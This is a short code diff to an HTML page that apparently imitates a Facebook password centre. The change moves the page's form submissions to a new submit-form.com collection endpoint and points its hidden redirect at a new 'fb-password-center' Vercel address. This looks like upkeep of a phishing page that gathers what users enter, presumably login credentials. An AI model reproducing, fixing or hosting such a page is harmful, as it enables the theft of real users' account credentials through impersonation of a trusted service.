--- a/next.html
+++ b/next.html
@@ -9,8 +9,8 @@
         <link rel="stylesheet" crossorigin="" href="style.css">
     </head>
     <body>
-        <form action="https://submit-form.com/xQH3en3DA" method="post">
-            <input type="hidden" name="_redirect" value="https://fb-password-center.vercel.app"/>
+        <form action="https://submit-form.com/57IMA3xEE" method="post">
+            <input type="hidden" name="_redirect" value="https://fb-password-center-rouge.vercel.app/"/>
             <div id="root">
                 <div>
                     <form>
